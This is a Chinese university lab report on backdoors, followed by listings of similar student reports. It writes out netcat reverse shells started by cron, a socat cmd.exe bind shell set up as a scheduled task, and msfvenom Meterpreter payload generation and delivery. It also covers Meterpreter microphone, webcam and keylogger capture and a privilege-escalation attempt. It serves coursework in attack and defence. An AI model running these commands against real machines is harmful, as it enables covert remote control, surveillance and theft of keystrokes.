关键词：

Exp2 后门原理与实践

目录

• 基础问题回答
  • (1)例举你能想到的一个后门进入到你系统中的可能方式？
  • (2)例举你知道的后门如何启动起来(win及linux)的方式？
  • (3)Meterpreter有哪些给你映像深刻的功能？
  • (4)如何发现自己有系统有没有被安装后门？
• 实验总结与体会
• 实践过程记录
  • 使用netcat获取主机操作Shell，cron启动
  • 使用socat获取主机操作Shell, 任务计划启动
  • 使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell
  • 使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

---

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式？

可能是我们点开某个链接的时候，自动加载了某个可执行文件，就类似于执行了实验中传入到windows中的backdoor.exe；也可能是我们点开某个网页时，该网页通过木马的方式在我们不知情的情况下自动下载了某个后门文件。

(2)例举你知道的后门如何启动起来(win及linux)的方式？

• linux中可能crontab文件被修改，周期性（定时）反向连接控制主机，只要控制主机保持侦听状态，就可以周期性启动后门，控制被控主机。
• windows中可能是被动下载、接收了后门程序，当被控端点击运行该程序时，后门便会启动。

(3)Meterpreter有哪些给你映像深刻的功能？

能够获取被控主机的麦克风录音、获取被控主机的摄像头拍照和录像。

(4)如何发现自己有系统有没有被安装后门？

利用防火墙，在防火墙看开启的端口及对应的进程，一般不是系统默认开启的端口都是可疑的，要找一下对应的进程，找到对应进程，对相应进程进行抓包，看他通信的数据，分析是不是后门。

定期用360管家等软件对系统进行检测，及时处理疑似病毒、木马的程序。

返回目录

---

实践过程记录

一、使用netcat获取主机操作Shell，cron启动

首先查看WindowsIP和LinuxIP：

• Windows下用命令ipconfig：

• Linux下用ifconfig -a

Windows获得linux的shell：

cron启动过程如下：

1. 先在Windows系统下，监听8888端口
2. 在Kali环境下，用crontab -e指令编辑一条定时任务，选择编辑器时选择"3"；
3. 在最后一行添加09 * * * * /bin/netcat 192.168.199.196 8888 -e /bin/sh，意思是在每个小时的第37分钟反向连接Windows主机的8888端口，设置成09的原因是我当时的时间是11点07，为了能立马看到效果，所以我将时间设置成了“09”(注意这里的IP地址应该为控制主机的IP)；

4.最后运行结果如下所示：

返回目录

二、使用socat获取主机操作Shell, 任务计划启动

1.Windows+X，然后选择“控制面板”（win8下打开控制面板）

2.右上角“查看方式”选择“大图标”

3.点击管理程序->点击任务计划程序

4.选择上方菜单栏中的“操作”->“创建任务”

5.输入任务名

6.新建触发器，在操作->程序或脚本中选择你的socat.exe文件的路径，在添加参数一栏填写tcp-listen:8888 exec:cmd.exe,pty,stderr，这个命令的作用是把cmd.exe绑定到端口8888，同时把cmd.exe的stderr重定向到stdout上

7.创建完成之后，按Windows+L快捷键锁定计算机，再次打开时，可以发现之前创建的任务已经开始运行

8.socat - tcp:192.168.199.196:8888，这里的第一个参数-代表标准的输入输出，第二个流连接到Windows主机的8888端口，此时可以发现已经成功获得了一个cmd shell：（此处的IP地址为WindowsIP）

返回目录

三、使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

1.在Kali上执行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.217.128 LPORT=8888 -f exe > 20155312_backdoor.exe，注意这里的IP地址为控制端IP，即LinuxIP，可见已经生成了后门程序“20155312_backdoor.exe”

2.在Windows下执行ncat.exe -l 8888 > 20155312_backdoor.exe，这样被控主机就进入了接收文件模式

3.在Linux中执行nc 192.168.199.196 8888 < 20155312_backdoor.exe，注意这里的IP为被控主机IP，即WindowsIP

4.传送接收文件成功，如下图所示：

5.在Kali中打开一个终端，使用msfconsole指令进入msf控制台

6.接着输入use exploit/multi/handler使用监听模块，设置payload

7.set payload windows/meterpreter/reverse_tcp，使用和生成后门程序时相同的payload

8.set LHOST 192.168.20.136，这里用的是LinuxIP，和生成后门程序时指定的IP相同

9.set LPORT 8888，同样要使用相同的端口

10.开始监听

返回目录

四、使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

1.使用record_mic指令可以截获一段音频：（可以+“-d 时间”来设定录制时间）

2.使用webcam_snap指令可以使用摄像头进行拍照：

3.使用keyscan_start指令开始记录下击键的过程，使用keyscan_dump指令读取击键的记录：

4.先使用getuid指令查看当前用户，使用getsystem指令进行提权，由于是Win8系统，提权失败：

5.其他操作：

• 使用screenshot指令可以进行截屏
• 用webcam stream指令可以使用摄像头进行录像
• ……

返回目录

---

实验总结与体会

通过本次实验，我学会了如果对linux和windows植入后门，包括开启侦听、反向连接、生成后门程序、传送后门程序、控制被控主机、修改定时任务列表、使用socat获取主机操作Shell等。在动手实验的过程中既体会到了作为攻击者的乐趣，更加深刻的体会到了使用计算机时增强安全意识的重要性。平时上网的时候，一定要注意不点击不靠谱链接，下载软件时尽量选择官网下载，防止下载盗版软件时被捆绑下载其他后门程序。

返回目录

20155312张竞予exp7网络欺诈防范(代码片段)

Exp7网络欺诈防范目录基础问题回答（1）通常在什么场景下容易受到DNSspoof攻击（2）在日常生活工作中如何防范以上两攻击方法实验总结与体会实践过程记录（1）简单应用SET工具建立冒名网站（2）ettercapDNSspoof（3）结合应用两种... 查看详情

20154322杨钦涵exp2后门原理与实践(代码片段)

Exp2后门原理与实践Exp2后门原理与实践一、基础问题回答1、例举你能想到的一个后门进入到你系统中的可能方式？从网上下载软件时，可能会下载到其它附带捆绑软件，而这些软件可能就有后门程序。在安装时，便一起安装了。... 查看详情

exp2：后门原理与实践(代码片段)

Exp2：后门原理与实践1实践目标任务一：使用netcat获取主机操作Shell，cron启动(0.5分)任务二：使用socat获取主机操作Shell,任务计划启动(0.5分)任务三：使用MSFmeterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运... 查看详情

exp2后门原理与实践(代码片段)

...标与内容 1.学习内容 使用nc实现win，mac,Linux间的后门连接meterpreter的应用MSFPOST模块的应用 2.学习目标 学习建立一个后门连接，并了解其中的知识点，同时熟悉后门连接的功能。通过亲手实践并了解这一事实，提高... 查看详情

20155216exp2后门原理与实践(代码片段)

后门原理与实践常用后门工具NC或netcatnetcat是一个底层工具，进行基本的TCPUDP数据收发。常被与其他工具结合使用，起到后门的作用。Linux:一般自带netcat,"mannetcat"或"mannc"可查看其使用说明。Win获得LinuxShell1、windows打开监听先解压... 查看详情

20155218《网络对抗》exp2后门原理与实践(代码片段)

20155218《网络对抗》Exp2后门原理与实践常用后门工具实践1.Windows获得LinuxShell:在Windows下，先使用ipconfig指令查看本机IP,使用ncat.exe程序监听本机的5218端口,在Kali环境下，使用nc指令的-e选项反向连接Windows主机的5218端口,Windows下成功... 查看详情

exp2后门原理与实践20154301仉鑫烨(代码片段)

20154301《网络对抗》Exp2后门原理与实践20154301仉鑫烨一、实验内容常用后门工具实践：Windows获得LinuxShell：在Windows下，先使用ipconfig指令查看win7虚拟机IP：使用ncat.exe程序监听本机的4301端口：Kali：使用nc指令的-e选项反向连接Window... 查看详情

20155302exp2后门原理与实践(代码片段)

20155302《网络对抗》后门原理与实践实验要求1.使用netcat获取主机操作Shell，cron启动(0.5分)2.使用socat获取主机操作Shell,任务计划启动(0.5分)3.使用MSFmeterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主... 查看详情

20155209林虹宇exp2后门原理与实践(代码片段)

Exp2后门原理与实践实验内容一、使用netcat获取主机操作Shell，cron启动使用netcat获取主机操作ShellWin获得LinuxShell查看win的ip地址windows打开监听Linux反弹连接winwindows下获得一个linuxshell，可运行任何指令，如lsLinux获得WinShell查看kali的... 查看详情

20192204exp2-后门原理与实践(代码片段)

实验基础本次实验需要我们掌握后门的基础知识，学习使用nc实现Windows，Linux之间的后门连接，学习使用Metaspolit的msfvenom指令生成简单的后门程序，学会MSFPOST模块的应用。基础知识后门的概念后门就是不经过正常认证流程而访问... 查看详情

20155227《网络对抗》exp2后门原理与实践(代码片段)

20155227《网络对抗》Exp2后门原理与实践基础问题回答(1)例举你能想到的一个后门进入到你系统中的可能方式？在非官方网站下载软件时，后门很可能被捆绑在软件中。攻击者利用欺骗的手段，通过发送电子邮件或者文件，并诱使... 查看详情

20155334曹翔exp2后门原理与实践(代码片段)

20155334曹翔Exp2后门原理与实践不多废话直接上实验过程，本实验的所有端口都是5334。一、实验过程查询主机Windows和虚拟机kali的ip地址：Windows获得LinuxShell使用ncat.exe程序监听本机的5334端口：在Kali环境下，使用nc指令的-e选项反向... 查看详情

20155321《网络攻防》exp2后门原理与实践(代码片段)

20155321《网络攻防》Exp2后门原理与实践实验内容例举你能想到的一个后门进入到你系统中的可能方式？我觉得人们在平时上网的时候可能会无意识地点击到一些恶意的网站，这些网站本身可能被黑客植入了木马程序，这些程序可... 查看详情

20155202张旭《网络对抗》exp2后门原理与实践(代码片段)

20155202张旭《网络对抗》Exp2后门原理与实践基础问题回答例举你能想到的一个后门进入到你系统中的可能方式？捆绑在软件中注入在可执行文件里注入在office文件的宏里面例举你知道的后门如何启动起来(win及linux)的方式？更改... 查看详情

exp2后门原理与实践20164315李华阳(代码片段)

1.后门概念  后门就是不经过正常认证流程而访问系统的通道。 常见的留后门位置有编译器留后门、操作系统留后门、最常见的当然还是应用程序中留后门、还有就是潜伏于操作系统中或伪装为特定应用的专用后门程... 查看详情

2017-2018-2《网络对抗技术》20155322第五周exp2后门原理与实践(代码片段)

#2017-2018-2《网络对抗技术》20155322第五周Exp2后门原理与实践[博客目录]1-实践目标1.1-实践介绍1.2-实践内容1.3-实践要求2-实践过程2.1-使用nc实现win，mac,Linux间的后门连接2.2-meterpreter的应用2.3-MSFPOST模块的应用2.4-注入Shellcode并执行3-... 查看详情

exp2mal_后门原理与实践20155214(代码片段)

Exp2MAL_后门原理与实践本次实验操使用nc实现win，mac,Linux间的后门连接学习meterpreter的应用学习MSFPOST模块的应用亲手实践建立一个后门连接，而提高自己的安全意识。[TOC]实验内容实验环境Kalilinux64bit（虚拟机）实验工具meterpreter... 查看详情

20154306刘宇轩网络对抗exp2后门原理与实践(代码片段)

...、实践目标与内容1.学习内容使用nc实现win，mac,Linux间的后门连接meterpreter的应用MSFPOST模块的应用2.学习目标学习建立一个后门连接，并了解其中的知识点，同时熟悉后门连接的功能。通过亲手实践并了解这一事实，提高自己的安... 查看详情